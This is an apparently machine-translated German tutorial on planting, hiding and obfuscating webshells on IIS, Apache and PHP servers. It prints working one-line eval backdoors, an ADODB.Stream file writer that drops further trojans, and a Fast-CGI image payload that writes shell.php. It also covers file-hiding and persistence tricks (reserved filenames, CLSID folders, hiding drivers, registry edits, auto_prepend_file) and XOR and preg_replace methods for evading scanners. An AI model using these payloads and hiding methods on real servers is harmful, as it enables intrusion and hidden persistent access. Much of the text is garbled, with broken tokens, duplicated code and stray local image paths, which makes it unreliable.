Webshell-Implementierung und versteckte Forschung

1. Was ist Webshell? Webshell, ein Skriptsprachenprogramm, ist ein Verwaltungstool des Webs, das die Berechtigung hat, den Webserver zu betreiben, auch Webadmin genannt. Webshell wird im Allgemeinen von Website-Administratoren für die Website-Verwaltung, Serververwaltung usw. verwendet. Da Webshell jedoch relativ leistungsstark ist, kann es Dateien hoch- und herunterladen, Datenbanken anzeigen und sogar einige systembezogene Befehle auf dem Server aufrufen (z. B. Benutzer erstellen). , Dateien ändern oder löschen usw.), die normalerweise von Hackern verwendet werden, verwenden einige Upload-Methoden, um die von ihnen geschriebene Webshell in das Verzeichnis der Webserverseite hochzuladen und dann über den Seitenzugriff einzudringen oder durch Einfügen eine Verbindung zum lokalen Computer herzustellen ein Satz Einige verwandte Tools führen direkt Eindringungsvorgänge auf dem Server durch.

1. Klassifizierung von Webshell

Webshell kann in PHP-Skripttrojaner, ASP-Skripttrojaner und .NET-basierte Skripttrojaner sowie JSP-Skripttrojaner auf Skriptbasis unterteilt werden. Im Ausland gibt es auch dynamische Webseiten, die in der Python-Skriptsprache geschrieben sind, und natürlich gibt es auch damit verbundene Webshells.

Je nach Funktion wird es auch in „großes Pferd“ und „kleines Pferd“ unterteilt. Der Begriff „Kleines Pferd“ bezieht sich beispielsweise normalerweise auf einen Satz: <%eval request("pass")%> Satz in ein Dokument umwandeln und dann den Dateinamen in xx.asp ändern. Senden Sie es dann an den Server. Hier wandelt die Eval-Methode die Anforderung („pass“) in Codeausführung um. Die Funktion der Anforderungsfunktion besteht darin, externe Dateien anzuwenden. Dies entspricht der Client-Konfiguration eines Ein-Satz-Trojaners. Serverkonfiguration (d. h. lokale Konfiguration):

Standard

set lP=server.createObject("Adodb.Stream")//Erstelle ein Stream-Objekt lP.Open //Öffnen lP.Type=2 //Im Textmodus lP.CharSet="gb2312" //Schriftartstandard lP.writetext request("newvalue") lP.SaveToFile server.mappath("newmm.asp"),2 //Schreiben Sie den Trojaner-Inhalt durch Überschreiben der Datei in newmm.asp. 2 ist die überschriebene Methode lP.Close //Schließe das Objekt set lP=nothing //Objekt freigeben Response.redirect "newmm.asp" //Zu newmm.asp umleiten (Fügen Sie den Inhalt hinzu, um das Trojanische Pferd zu generieren)

1

2action

3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 < form

= http : //Host path/TEXT.asp method=post>< Textbereich Name= Wert Spalten=120Zeilen=10Breite =45> set lP=server. createObject ("Adodb.Stream")//Erstellen Sie ein Stream-ObjektlP.Offen //Offen lP.Typ= 2 //Im Textmodus lP.CharSet= "gb2312" //SchriftartstandardlP.writetext request ( "newvalue") lP.SaveToFile server.mappath("newmm.asp"), 2//Schreiben Sie den Trojaner-Inhalt in newmm.asp, indem Sie die Datei überschreiben. 2 ist die überschriebene Methode lP.Schließen//Schließen Sie das Objekt set lP=nothing//Release object Antwort.weiterleiten"newmm.asp"//weiterleiten zu newmm .asp </textarea> <textarea name=newvalue cols=120Zeilen=10Breite=45> (Fügen Sie den Inhalt hinzu, um den Trojaner zu generieren) </textarea> <BR> <Mitte> < br> <Eingabe Typ=Submit Wert = Senden>

Hier wird der Trojaner durch Absenden des Formulars übermittelt. Die spezifische Methode besteht darin, eine Objekt-IP zu definieren und dann den Inhalt in Newvalue in Textform zu schreiben (der Inhalt von Newvalue befindet sich im Textbereich). Definition), schreiben Sie, um durch Überschreiben eine ASP-Datei zu generieren, und führen Sie dann dieses Skript aus. Der Wert im Client stellt den Namen des Formulars dar, der mit dem Formularnamen in der Post-Übermittlung des Servers (lokaler Computer) identisch sein muss. Daher kann der Wert hier ein beliebiges Zeichen sein, das einem Passwort oder ähnlichem entspricht , aber das „Passwort“ ist im Klartext und kann abgefangen werden. Das Ein-Satz-Prinzip von PHP ähnelt dem oben genannten Prinzip, das heißt, der Unterschied in der Sprache führt zu einer unterschiedlichen Syntax. So funktionieren Ponys im Grunde.

Malaysias Arbeitsmodell ist viel einfacher. Es gibt keinen Unterschied zwischen dem Client und dem Server. Einige Skriptexperten haben die Sicherheitslücke direkt nach Malaysia hochgeladen. Kopieren Sie dann die malaysische URL-Adresse und greifen Sie direkt darauf zu, um Penetrationsarbeiten auf dem Webserver auf der Seite durchzuführen. Da Da Ma jedoch über viele Funktionen verfügt, ist die Größe relativ groß und kann das Upload-Limit der Website überschreiten. Die Größe von Da Ma kann jedoch gesteuert werden (z. B. Kopieren). Code mehrmals oder fügen Sie den Code in eine verstümmelte Datei ein, aber Xiaomas Vorgang ist umständlicher. Sie können zuerst Xiaoma hochladen, um die Webshell zu erhalten, und dann Xiaoma hochladen, um den Server über Xiaomas Verbindung zu erhalten.

2. So laden Sie eine Webshell hoch

1. Analyse der Schwachstellen-Upload

Jetzt gibt es verschiedene Webserver-Programme für verschiedene Webserver-Systeme, Windows-Seite ist iis, und der Mainstream unter Linux ist nginx. Diese Dienste stellen eine große Hilfe beim Aufbau von Webservern dar, bringen jedoch auch versteckte Gefahren für den Server mit sich. Diese Server weisen einige Schwachstellen auf, die von Hackern leicht ausgenutzt werden können.

(1)iis-Verzeichnis-Parsing-Schwachstelle

Zum Beispiel: /xx.asp/xx.jpg

Obwohl die hochgeladene JPG-Datei, wenn die Datei in xx.asp ist Ordner, dass iis die Bilddatei als xx.asp analysiert. Diese Sicherheitslücke besteht in der Version iis5.x/6.0.

(2) Sicherheitslücke beim Parsen von Dateien

Zum Beispiel: xx.asp;.jpg. Beim Hochladen der Webseite wird die JPG-Datei erkannt, aber nach dem Hochladen wird sie von iis nicht analysiert. Nachfolgende Zeichen analysieren die Datei ebenfalls in eine ASP-Datei. Diese Sicherheitslücke besteht in den Versionen iis5.x/6.0.

(3) Dateinamenanalyse

Zum Beispiel: xx.cer/xx.cdx/xx.asa. Unter iis6.0 werden CER-Dateien, CDX-Dateien und ASA-Dateien als ausführbare Dateien behandelt und der darin enthaltene ASP-Code wird ebenfalls ausgeführt. (Die ASA-Datei ist eine ASP-spezifische Konfigurationsdatei und CER ist die Zertifikatsdatei).

(4) Schwachstelle beim Fast-CGI-Parsing

Laden Sie das Bild xx.jpg hoch, wenn Fast-CGI auf dem Webserver aktiviert ist. Der Inhalt ist:

Default

<?php fputs(fopen(' shell .php','w'),'<?php eval($_POST[shell])?>');?>

1	fputs(fopen('shell.php','w'),'eval($_POST[shell])?>');?>

1 < ;?phpfputs(fopen('shell.php','w'),' <🎜>eval<🎜>(<🎜>$_POST<🎜>[<🎜>shell<🎜>]<🎜>)<🎜>?>') ;?> tr >

Der hier verwendete Fput erstellt eine Shell.php-Datei und schreibt einen Satz. Durch den Zugriff auf den Pfad xx.jpg/.php wird in diesem Pfad ein Trojaner mit einem Satz „shell.php“ generiert. Diese Sicherheitslücke besteht in IIS 7.0/7.5 und Nginx-Versionen unter 8.03. Gebietsschema: PHP, Prel, Bourne Shell, C und andere Sprachen.

*Hinweis: Fast-CGI ist eine aktualisierte Version von CGI und bezieht sich auf eine Schnittstelle, die eine Mensch-Computer-Interaktion auf dem Server ermöglicht. Da CGI bei jeder Ausführung einen Prozess mit einem Fork starten muss, wird Fast-CGI jedoch immer nach der Aktivierung ausgeführt und es ist nicht erforderlich, für jede Anforderung einen Prozess zu forken. Es benötigt weniger Speicher als gewöhnliches CGI.

(5) Apache-Parsing-Schwachstelle

Die Art und Weise, wie Apache analysiert, erfolgt von rechts nach links. Wenn die Analyse nicht erfolgreich ist, möchte sie eine nach links verschieben, aber das Hochladen im Hintergrund hängt normalerweise davon ab Das Suffix ganz rechts, daher kann das Pferd xx.php.rar genannt werden, da Apache es nicht als PHP analysieren kann, aber der Hintergrund-Upload-Punkt analysiert es als RAR und umgeht es somit. Einschränkungen beim Hochladen von Dateisuffixen

2. Hochladen abschneiden

Benennen Sie beim Hochladen von Bildern beispielsweise 1.asp .jpg (nach asp steht ein Leerzeichen). Verwenden Sie beim Hochladen NC oder burpsuite Grab das Formular und fügen Sie asp nach dem Upload-Namen hinzu

c:>kopieren3.asp .C:aux.asp

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image020.png

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image022.jpg

Erstellen Sie eine aux.asp im Laufwerk C. Diese Datei kann in der grafischen Oberfläche nicht gelöscht werden.

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image023.png

Zum Löschen müssen Sie den Befehl del verwenden.

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image024.png

Es gibt keine Aufforderung nach dem Löschen, aber die Datei ist tatsächlich verschwunden.

Natürlich kann mit dieser Methode eine Webshell erstellt werden, die nicht über die grafische Oberfläche gelöscht werden kann. Wenn sie jedoch direkt im Stammverzeichnis der Webseite abgelegt wird, wird sie von einem erfahrenen Netzwerkadministrator trotzdem gelöscht sieht es.

②clsid versteckt

Jedes Programm in Windows hat eine clsid. Wenn Sie einen Ordner x.{program clsid} nennen, geben Sie die folgenden zwei Befehle ein:

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image026.jpg

Nach der Erstellung

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image027.png

Klicken Sie, um das Kontrollfeld aufzurufen, aber tatsächlich ist die Datei immer noch ein Ordner, und Malaysia kann auch einen solchen Ordner mit einer clsid erstellen und ihn als das entsprechende Programm bezeichnen Geben Sie als Netzwerkadministrator beispielsweise den Papierkorbordner ein, um einen Ordner mit der Papierkorb-CLSID zu erstellen, und kopieren Sie ein reserviertes Wort „asp“ hinein. Sie können auch

Standard verwenden

attrib h s r d/s /d

1	attrib h s r d/s/d

1

attrib

h

s

r

d

/s

/

d

1	file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png

Ändern Sie die Eigenschaften der Datei und verbergen Sie sie standardmäßig nicht Dateien werden angezeigt und der Papierkorbordner wird automatisch erstellt, sodass eine unsterbliche Webshell auf dem Server ausgeblendet werden kann. ③Technologie zum Ausblenden von Treibern Das Prinzip besteht darin, dass das System im Windows-Dateisystem beim Öffnen eines Ordners eine IRP_MJ_DIRECTORY_CONTROL-Funktion sendet. Diese Funktion kann einen Puffer zuweisen und die Informationen Durch das Durchlaufen der Unterordner wird der Ordner im Puffer gespeichert. Wenn die Dateinamen übereinstimmen, wird der aktuelle Ordner oder die aktuelle Datei umgangen. Ich habe den Code überprüft. Nach meinem Verständnis wird beim Abfragen der Zieldatei der Offset der Datei basierend auf dem durchlaufenen Zeiger hinzugefügt. Der Zielordner wird nicht gescannt, sondern direkt übersprungen. Was die Implementierung dieser Technologie betrifft, so ist sie aufgrund der Unterstützung von Header-Dateien und der Systemunterstützung (die Dateisysteme verschiedener Systeme werden unterschiedlich sein) schwierig zu bedienen, obwohl es im Internet viele C-Quellcodes gibt. . Ich habe das Programm Easy File Locker online gefunden und muss es auf dem Webserver installieren und Berechtigungen für die Zieldatei festlegen. Standardfile:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png

1Datei:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image028.png
Zu den Berechtigungseinstellungen gehören „lesbar“, „schreibbar“, „löschbar“ und „sichtbar“.

Standard

file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

1	file:///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

1 td>

file

:

///C:UsersSAKAIY~1AppDataLocalTempmsohtmlclip11clip_image030.jpg

Wie Sie im obigen Bild sehen können, haben wir es ausgeblendet. Wie bereits erwähnt, wird der absolute Pfad direkt umgangen Zugegriffen werden kann. Mein Verständnis ist:

1 2 3 4

c:WINDOWSxlkfs.dat c:WINDOWSxlkfs.dll c:WINDOWSxlkfs.ini c:WINDOWSsystem32driversxlkfs.sys

Standard

c:WINDOWSxlkfs.dat c:WINDOWSxlkfs.dll c:WINDOWSxlkfs.ini c:WINDOWSsystem32driversxlkfs.sys

tbody>

1

2

3

4

c

:

WINDOWS

xlkfs

.

dat

c:

WINDOWS

1	include($include);?>

xlkfs.dllc:WINDOWSxlkfs.inic:WINDOWSsystem32Treiberxlkfs.sys

Diese 4 Dateien ersetzen die Traversal-Abfrage, indem der absolute Pfad nicht eingegeben wird, sondern die Abfrage über die oben genannten 4 Dateien erfolgt Dies entspricht der Erstellung eines separaten Treibers für versteckte Dateien. Um nicht vom Administrator entdeckt zu werden, können Sie das Easy FileLocker-Programm löschen, aber Sie können die oben genannten 4 Dateien nicht löschen. Nachdem Sie das Programm gelöscht haben, können Sie weiterhin darauf zugreifen, indem Sie den absoluten Pfad eingeben, wodurch die Funktion des Ausblendens der Hintertür erreicht wird④Registrierung ausblendenRegistrierungspfad: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorer＼AdvancedFolderHiddenSHOWALL In diesem Pfad befindet sich ein CheckedValue-Schlüssel. Ändern Sie ihn in 0. Wenn kein CheckValue-Schlüssel vorhanden ist, erstellen Sie direkt einen und weisen Sie ihm den Wert 0 zu. Dann wird die erstellte versteckte Datei vollständig ausgeblendet, auch in Auch die nächste Option „Alle Dateien anzeigen“ kann nicht angezeigt werden. (2) Ein-Satz-Trojaner versteckt ①Header-Datei-Inklusion verstecktIn einigen Skriptdateien im Web haben einige Dateien Include-Anweisungen, Sie können diese verwenden. Dieses Include Die Methode enthält eine Satzdatei und diese Sätze werden beim Zugriff auf diese Seite direkt aufgerufen. asp include-Anweisung: , geben Sie den Pfad direkt ein, und der Dateipfad ist der Pfad auf dem Webserver. Sie können Webmaster Stop verwenden, um einen Satz von NTFS-Stream-Pony in das Bild zu schreiben. Nachdem Sie das „“ in „:“ im Pfad geschrieben haben, wird das Bild nicht angezeigt und dann gefunden Gehen Sie zu einer ASP-Datei auf dem Webserver und schreiben Sie eine Include-Anweisung am Anfang der Datei, <🎜><🎜>php enthält die Anweisung: <🎜><🎜><🎜><🎜><🎜><🎜>Default<🎜><🎜><🎜><🎜><🎜><🎜 >

1	<🎜>include<🎜>(<🎜> $ include<🎜>)<🎜>;<🎜>?>

$include kann hier ein externer Pfad sein, wie zum Beispiel:

http://www.aaa.com/1.php?Include=http://www . bbb.com/hehe.php

Der Inhalt von 1.php auf dieser AAA ist

Standard

<?php include($include);?>

1	include($include);?>

1

<🎜>include<🎜>(<🎜>$include<🎜>)<🎜>;<🎜>?>

bedeutet Inklusion. bbb ist ein externer Server, sofern dieser Server PHP nicht unterstützen kann. Andernfalls wird hehe.php (dh ein Satzpferd) auf dem BBB-Server ausgeführt, aaa jedoch nicht.

②Versteckter Satz der Konfigurationsdatei (PHP)

Nachdem Sie die PHP-Webshell erhalten haben, können Sie php.ini verwenden, um Dateien auszublenden und Konfigurationsdateien zu bearbeiten Inhalt einer bestimmten Datei in die Kopf- und Fußzeile einer beliebigen Schnittstelle einfügen:

auto_prepend_file =hehe.php

Dann schauen Sie sich

include_path an = „E:PHPnow-1.5.6htdocs;“

Diese Konfigurationsinformationen geben den Speicherort der Sammlung zum Laden der Kopf- und Fußzeile an. Die Pfadregel ist „path1;path2“, was bedeutet, dass Der Ordner im Pfad 1 wird die Kopf- und Fußzeilendateien zu den Dateien im Pfad hinzufügen, da hier ein „.“ den Stammpfad angibt, was dem Hinzufügen zur Homepage entspricht, und dann einen Satz in das Hehe schreiben .asp-Datei, und das ist es. Fügen Sie die Header-Funktion über PHP hinzu und schreiben Sie einen Satz auf der Homepage der Website.

③404 Pony

404 Pony zeigt beim Zugriff eine 404-Seite an, die tatsächlich nicht vorhanden ist. Im Allgemeinen können Sie den Trojaner-Code fünfmal drücken, um ihn zu entfernen es raus.

4. Ein Satz über Webshell-Antivirus und Antivirus

1. Konstruktionsmethode zur Umgehung der Erkennung (PHP)

Allgemeine Erkennungsprogramme filtern „_POST“. Für Zeichen wie „system“ und „call_user_func_array“ können Sie derzeit einige Erkennungsprogramme verwenden. Das Grundprinzip besteht darin, dass jedes Zeichen in PHP einem Binärwert entspricht XOR-Wert von zwei Zeichen.

Sieht zum Beispiel wie der Code aus

Standard

<?php @$_ ; // Hier erhöhe sich '_' um 1 $__=("#"^"|"); $__=("."^"~"); // P $__=("/"^"`"); // O $__=("|"^"/"); $__=("{"^"/"); ?>

1 2 3 4 5 6 7 8

@$_ ; // 这里 让’_’自加1 $__=("#"^"|"); // _ $__=("."^"~"); // P $__=("/"^"`"); // O $__=("|"^"/"); // S $__=("{"^"/"); // T ?>

1

2

3

4

5

6

7

8

<🎜><🎜><🎜>@<🎜>$_<🎜> <🎜>;<🎜>                                                              ><🎜>< 🎜><🎜><🎜><🎜><🎜>$__ <🎜>=<🎜>(<🎜>"#"<🎜>^<🎜>"|"<🎜>)< 🎜>;<🎜> <🎜>// _<🎜><🎜><🎜> <🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜 >$__<🎜>=<🎜>(<🎜>"."<🎜>^ <🎜>"~"<🎜>)<🎜>;<🎜>                                                     <🎜><🎜><🎜><🎜><🎜><🎜><🎜>< 🎜><🎜><🎜><🎜> $__<🎜>=<🎜>(<🎜>"/"<. 🎜>^<🎜>"`"<🎜>)<🎜>;<🎜>                                          <🎜><🎜><🎜 ><🎜>< 🎜>$__<🎜>=<🎜>(<🎜>"|"<🎜>^<🎜>"/"<🎜>)<🎜>;<. 🎜>                                                                         🎜>=<🎜>(<🎜>" {"<🎜>^<🎜>"/"<🎜>)<🎜>;<🎜>                                                      🎜><🎜><🎜><🎜><🎜>< 🎜><🎜><🎜><🎜>< 🎜>?>

Dann können die Struktur und ein Satz als

Standard geschrieben werden

<?php @$_ ; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/ "); // Der Wert von $__ ist _POST @${$__}[!$_](${$__}[$_]);?>

1 2 3

@$_ ; $__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); // $__的值为_POST @${$__}[!$_](${$__}[$_]);?>

1

2

3

@

$_

;

$__

=

(

"#"^ "|"

)

.

1	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/")

(

"."

^

"~"

)

.

(

" /"

^

"`"

)

.

(

"|"^"/").

(

"{"

^"/")

;

 

1 2 3 4

functionfunfunc($str){} echopreg_replace("//ies",'funfunc("1")',$_POST["cmd"]); ?>

// Der Wert von $__ ist _POST @${$__}[!$_](${ $__}[$_]);?>

// Das Ergebnis ist @ $_POST[0]($POST[1])!$_ stellt das Gegenteil von 1 dar. In der Sprache steht 1 für wahr und das Gegenteil ist 0 (falsch) Aber diese Bypass-Methode ist ziemlich schwach, auch wenn es sich um das XOR des Binärwerts zweier Zeichen handelt, wenn wir ein bestimmtes Zeichen verwenden möchten, wenden wir dennoch den Wert dieses Zeichens an Zeichen, wie zum Beispiel Default$__=("#"^"|").(" ."^"~").("/" ^"`").("|"^"/").("{"^"/") Der Binärwert von tbody>

1	$__=("#"^"|").(" ."^"~" ).("/"^"`").("|"^ "/").("{"^"/")

ist derselbe wie der Wert des _POST-Zeichens, wenn das Erkennungsprogramm den Wert von erkennt Der Binärcode wird trotzdem getötet. 2. Methode zum Ersetzen regulärer Ausdrücke (PHP) In PHP gibt es eine Funktion preg_replace(), die das Ersetzen regulärer Ausdrücke realisieren kann. Die Verwendung der Substitution zur Umgehung des Erkennungssystems erfordert auch eine Funktionsfunktion in der PHP-Skriptsprache. Wenn die Funktion aufgerufen wird und der dem formalen Parameter in der Funktion zugewiesene Wert einen Befehl enthält, wird der Befehl ausgeführt. Standard(. ?)/ies",'funfunc("1")', $_POST["cmd"]); ?>

1 2 3 4

<🎜><🎜><🎜>function<🎜><🎜>funfunc< 🎜>(<🎜>$str<🎜>)<🎜>{<🎜>}<🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜><🎜> <🎜>echopreg_replace<🎜>(<🎜>"//ies",'funfunc("1")',$_POST["cmd"]);?>

Der obige Code ist ein Ersetzungsprozess. Erstellen Sie zunächst eine leere Funktion und verwenden Sie dann die Funktion preg_replace, um